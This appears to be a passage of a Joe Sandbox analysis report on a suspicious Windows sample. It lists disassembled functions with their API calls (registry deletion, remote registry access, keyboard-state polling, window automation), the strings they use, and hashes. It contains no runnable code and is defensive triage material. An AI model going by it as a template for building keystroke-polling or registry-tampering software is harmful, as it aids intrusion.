                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EED4BD
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EED4E6
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EED5A1
                                                                                                                                                                                                                                        • Part of subcall function 00EED48D: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EED503
                                                                                                                                                                                                                                        • Part of subcall function 00EED48D: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EED516
                                                                                                                                                                                                                                        • Part of subcall function 00EED48D: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EED528
                                                                                                                                                                                                                                        • Part of subcall function 00EED48D: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EED55E
                                                                                                                                                                                                                                        • Part of subcall function 00EED48D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EED581
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EED54C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                      • Opcode ID: b9e7b5d8dd67071f0820d0eb9706ee9348194784aa79dfed81ed5a8e7c63eb43
                                                                                                                                                                                                                                      • Instruction ID: ec24bc769f8bfc55c00f4f0fd21c3bae51b455dbc3e2e70f25b9afc9225b30b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9e7b5d8dd67071f0820d0eb9706ee9348194784aa79dfed81ed5a8e7c63eb43
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE316D7194622DBFDB219B52DC88EFFBB7DEF85758F000165B801F2140DB709A49DAA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00E803D4
                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 00E803C8
                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00E803E2
                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E803A2
                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00E803B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 798235881-1714406822
                                                                                                                                                                                                                                      • Opcode ID: 6e4b84331caf752afcf2f9b634cda2536491d5eb476a46f416c9f98464a92a2b
                                                                                                                                                                                                                                      • Instruction ID: 84fb1bd5cf8666600c35de3092aa056424ed5f218276dbc28733f7f70b63d423
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e4b84331caf752afcf2f9b634cda2536491d5eb476a46f416c9f98464a92a2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721F632A4A7016FD7607BA59C06B6A3BD5EB45F61F041025F91DB72C0DF709C08A761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00ECEDD6
                                                                                                                                                                                                                                        • Part of subcall function 00E7ED9F: timeGetTime.WINMM(?,?,00ECEDF6), ref: 00E7EDA3
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00ECEE03
                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006ED87,00000000), ref: 00ECEE27
                                                                                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ECEE49
                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 00ECEE68
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ECEE76
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ECEE95
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00ECEEA0
                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 00ECEEAC
                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00ECEEBD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                      • Opcode ID: 594cdaddc5b880711e65e9b96b75b2052bef10e3ab3b7b9bbb9e2d495492acd6
                                                                                                                                                                                                                                      • Instruction ID: 67a30f56cd9391d3d4bacc46b2ccc8cc56fc6f2090cdc9ffdeec414986922df5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 594cdaddc5b880711e65e9b96b75b2052bef10e3ab3b7b9bbb9e2d495492acd6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82219270104608BFE711AF22ED8AF363F6BFB85798F001419F102B23A1CB669D45E661
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ECF17F
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ECF195
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ECF1A6
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ECF1B8
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ECF1C9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString
                                                                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                      • API String ID: 890592661-1007645807
                                                                                                                                                                                                                                      • Opcode ID: 702d93dc09ea327660b7f3ccf887453f11ea4e0189273de9e595f27706e90ab8
                                                                                                                                                                                                                                      • Instruction ID: a402b4771379101e0c9066725feca1a44ce5fe677b4a0861fe504977d91b923f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702d93dc09ea327660b7f3ccf887453f11ea4e0189273de9e595f27706e90ab8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A11E331691379B9D710B366EC4AEFF7ABCEBD1B44F40142AB401B20D2DAB05985C6B2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ECA6C5
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00ECA730
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00ECA750
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00ECA767
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00ECA796
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00ECA7A7
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00ECA7D3
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00ECA7E1
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00ECA80A
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00ECA818
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00ECA841
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00ECA84F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: 4abc70e7c06b9b1cef9952c5e8489eba2c9cbbc74381fc99db6950ee02528e2e
                                                                                                                                                                                                                                      • Instruction ID: fc341e12c96549234d75e1c7203382021319d2c274d08f57d8234ad53cf4b955
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4abc70e7c06b9b1cef9952c5e8489eba2c9cbbc74381fc99db6950ee02528e2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51D72090478C19EB35DBB08A15FEABFF49F0134CF0C55AED5C26A1C2DA659A4EC763
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00EC6380
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC6399
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00EC63F7
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00EC6407
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC6419
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00EC646D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC647B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC648D
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00EC64CF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EC64E2
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EC64F8
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EC6505
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                      • Opcode ID: d9cd1bcf12fea207a9f3b15e503ce18683a871b8ab45b6a504363b7ec826262a
                                                                                                                                                                                                                                      • Instruction ID: 7b9165202d1205cbd64bc13193244bddca401009d3ef166bc1079155d02d57f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9cd1bcf12fea207a9f3b15e503ce18683a871b8ab45b6a504363b7ec826262a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E511F70A04219AFDF08CF69DD89AAE7BB6FB88315F10812DF919F6290D7719D05CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79257: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E78EDD,?,00000000,?,?,?,?,00E78EAF,00000000,?), ref: 00E792BA
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00E78F76
                                                                                                                                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00E78EAF,00000000,?), ref: 00E79010
                                                                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00EB7005
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E78EAF,00000000,?), ref: 00EB7033
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E78EAF,00000000,?), ref: 00EB704A
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E78EAF,00000000), ref: 00EB7066
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EB7078
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                                                                      • Opcode ID: 6b3f874d140095a6dc1c575a8b83d92f3c24052f0a1f6a9edc825a1d536f3705
                                                                                                                                                                                                                                      • Instruction ID: 2fd5a139ca8c183037ed0d86f85f0f7dfeda1380c0bec8c7bfd4f9e17f09c22b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b3f874d140095a6dc1c575a8b83d92f3c24052f0a1f6a9edc825a1d536f3705
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17618230209608DFDB25AF15DE4876A77F3FF90325F10A51AE08AB6960CB71A995EF40
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79B44: GetWindowLongW.USER32(?,000000EB), ref: 00E79B52
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00E79A62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                                                                      • Opcode ID: 8a28cff3478fb58a03505572a8cc5c8400134658ded9bfd5839d145a00fd4ca5
                                                                                                                                                                                                                                      • Instruction ID: 0d740081a955c86fc56ad528f7d3c3e129566c5864aa0223e3cd82609e76121a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a28cff3478fb58a03505572a8cc5c8400134658ded9bfd5839d145a00fd4ca5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7441D531105604AFDB209F399C84BFA3BA7EF86334F249605F9A6AB1E2C7318C41DB10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EC3D27
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EC3E22
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00EC3E97
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EC3EED
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC3F12
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EC3F30
                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 00EC3F37
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EC3FB1
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00EC3FED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                                                                                      • API String ID: 1412819556-679674701
                                                                                                                                                                                                                                      • Opcode ID: 537f373c5f4b44b0c4490e2944bdc3032c03d3a9e4ae931189b63f0f96715a45
                                                                                                                                                                                                                                      • Instruction ID: 2e16f5597d14eda5141fb166410e151d360a3e9dd6c3739ad3bb040032e7b93b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 537f373c5f4b44b0c4490e2944bdc3032c03d3a9e4ae931189b63f0f96715a45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45A1BD71204306AFD718DF24C985FEABBA9FF44354F00951DFA9AE2190DB31EA46CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,00EAFCA4,00000001,0000138C,00000001,?,00000001,?,?,?), ref: 00EC9D7D
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00EAFCA4,00000001), ref: 00EC9D86
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00EAFCA4,00000001,0000138C,00000001,?,00000001,?,?,?,00000000), ref: 00EC9DA8
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00EAFCA4,00000001), ref: 00EC9DAB
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EC9ECC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 4072794657-2268648507
                                                                                                                                                                                                                                      • Opcode ID: b102caea132ee6d227552bd33de99a8f68d50dea75a2c70e3c504890322b7fdc
                                                                                                                                                                                                                                      • Instruction ID: 51ecb88ece3143a4b13b42145239bb0572bfe760d71c6e665c3b548a970a982c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b102caea132ee6d227552bd33de99a8f68d50dea75a2c70e3c504890322b7fdc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9441617294021DAACB04FBD0EE86EEE77B8AF54344F102065F60572092EA356F59CF61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EC0DD1
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EC0DED
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EC0E09
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EC0E33
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00EC0E5B
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC0E66
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC0E6B
                                                                                                                                                                                                                                      Strings
